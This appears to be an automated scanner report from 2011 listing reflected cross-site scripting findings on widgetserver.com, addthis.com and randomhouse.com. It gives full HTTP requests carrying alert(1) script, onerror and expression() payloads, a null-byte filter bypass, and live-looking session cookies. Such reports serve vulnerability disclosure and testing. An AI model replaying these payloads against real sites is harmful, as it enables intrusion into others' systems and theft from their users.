GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img%20src%3da%20onerror%3dalert(1)>4321673800c/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:09 GMT Expires: Fri, 29 Apr 2011 21:50:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 3871
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74b03<a>2abf9f455e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:48:26 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442 was submitted in the REST URL parameter 18. This input was echoed as 780d0<img src=a onerror=alert(1)>252d78a442 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:54 GMT Expires: Fri, 29 Apr 2011 21:50:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 3912
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16936<a>d3f95d2f680 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:14 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2 was submitted in the REST URL parameter 18. This input was echoed as b607c<img src=a onerror=alert(1)>58e425fd2c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:27 GMT Expires: Fri, 29 Apr 2011 21:48:27 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 7210
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78066<a>4feec1bf34c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:46:37 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413 was submitted in the REST URL parameter 18. This input was echoed as b670d<img src=a onerror=alert(1)>0648de1f413 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:54 GMT Expires: Fri, 29 Apr 2011 21:50:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 2654
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5147c<a>ad3be1bde7f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:04 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0666<script>alert(1)</script>06d3328fdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css?48996 HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 26 Apr 2011 21:48:52 GMT Expires: Thu, 31 Dec 2020 00:00:00 GMT Last-Modified: Wed, 20 Apr 2011 23:47:00 GMT max-age: 604800 P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 119
The requested resource(/syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css) is not available
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1d121<script>alert(1)</script>cb3f46b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 130 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:15 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:15 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Tue, 26 Apr 2011 23:30:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 26 Apr 2011 23:30:15 GMT Connection: close
The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %00de38d<script>alert(1)</script>e9bd80595cd was submitted in the from parameter. This input was echoed as de38d<script>alert(1)</script>e9bd80595cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49283"%3balert(1)//e4e0e74635 was submitted in the from parameter. This input was echoed as 49283";alert(1)//e4e0e74635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.do?from=randomhouse49283"%3balert(1)//e4e0e74635 HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse49283";alert(1)//e4e0e74635"; //--> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17962"><script>alert(1)</script>6f8a1d41037 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037 HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f99'%3balert(1)//44955d1d1a9 was submitted in the from parameter. This input was echoed as 74f99';alert(1)//44955d1d1a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /account.do?from=74f99'%3balert(1)//44955d1d1a9 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:46 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16995
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( '74f99';alert(1)//44955d1d1a9' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from'); if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d54"><script>alert(1)</script>e958056cf4c was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /account.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a0"%3balert(1)//4a17c54e7d8 was submitted in the from parameter. This input was echoed as 584a0";alert(1)//4a17c54e7d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /account.do?from=randomhouse584a0"%3balert(1)//4a17c54e7d8 HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse584a0";alert(1)//4a17c54e7d8"; //--> ...[SNIP]...
The value of the confirmPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef75"><script>alert(1)</script>4190709400fddb906 was submitted in the confirmPassword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the email request parameter is copied into the HTML document as plain text between tags. The payload 41e31<script>alert(1)</script>df5ae1c2f9536e1ca was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc3b"><script>alert(1)</script>a734b570e5619ecdd was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c691"><script>alert(1)</script>070b45f3bf0 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %0086d84<script>alert(1)</script>db18887c0e9 was submitted in the from parameter. This input was echoed as 86d84<script>alert(1)</script>db18887c0e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 was submitted in the from parameter. This input was echoed as 2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /password.do?from=2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:27 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 11462
<!-- forgottenPassword.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1"> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d764b"><script>alert(1)</script>ff6160e5949 was submitted in the from parameter. This input was echoed as d764b"><script>alert(1)</script>ff6160e5949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /password.do?from=%00d764b"><script>alert(1)</script>ff6160e5949 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:32 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 11441
<!-- forgottenPassword.vm -->
